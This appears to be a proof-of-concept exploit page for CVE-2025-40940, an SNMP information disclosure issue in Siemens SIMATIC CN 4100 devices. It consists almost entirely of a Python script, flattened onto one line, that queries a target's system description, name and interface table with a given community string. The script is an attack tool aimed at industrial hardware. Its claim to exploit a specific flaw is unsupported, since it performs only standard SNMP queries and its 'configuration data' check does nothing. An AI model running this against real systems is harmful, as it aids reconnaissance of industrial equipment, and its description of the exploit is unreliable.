CVE-2025-40940: SIMATIC CN 4100 SNMP敏感信息泄露漏洞

# CVE-2025-40940 PoC - SIMATIC CN 4100 SNMP Information Disclosure # Description: Exploits inconsistent SNMP behavior to extract sensitive data import socket import sys from pysnmp.hlapi import * def snmp_get(community, target_ip, oid, version='2c'): """Send SNMP GET request to target device""" iterator = getCmd( SnmpEngine(), CommunityData(community, mpModel=1 if version=='2c' else 0), UdpTransportTarget((target_ip, 161)), ContextData(), ObjectType(ObjectIdentity(oid)) ) errorIndication, errorStatus, errorIndex, varBinds = next(iterator) if errorIndication: print(f"[ERROR] {errorIndication}") return None else: for varBind in varBinds: return str(varBind[1]) def snmp_walk(community, target_ip, oid_base, version='2c'): """Perform SNMP WALK to enumerate MIB tree""" results = [] iterator = nextCmd( SnmpEngine(), CommunityData(community, mpModel=1 if version=='2c' else 0), UdpTransportTarget((target_ip, 161)), ContextData(), ObjectType(ObjectIdentity(oid_base)), lexicographicMode=False ) for errorIndication, errorStatus, errorIndex, varBinds in iterator: if errorIndication: break for varBind in varBinds: results.append((str(varBind[0]), str(varBind[1]))) return results def main(): if len(sys.argv) < 3: print("Usage: python cve_2025_40940_poc.py <target_ip> <community_string>") sys.exit(1) target_ip = sys.argv[1] community = sys.argv[2] print(f"[*] Targeting {target_ip} - CVE-2025-40940 PoC") print(f"[*] Testing SNMP service availability...") # Test basic system info disclosure sysDescr = snmp_get(community, target_ip, '1.3.6.1.2.1.1.1.0') if sysDescr: print(f"[+] System Description: {sysDescr}") sysName = snmp_get(community, target_ip, '1.3.6.1.2.1.1.5.0') if sysName: print(f"[+] System Name: {sysName}") # Enumerate interface info print("[*] Enumerating network interfaces...") ifTable = snmp_walk(community, target_ip, '1.3.6.1.2.1.2.2.1') print(f"[+] Found {len(ifTable)} interface entries") # Test for sensitive config exposure print("[*] Checking for exposed configuration data...") print("\n[!] Note: This PoC demonstrates SNMP information disclosure") print("[!] Requires valid community string and high-privilege access") if __name__ == "__main__": main()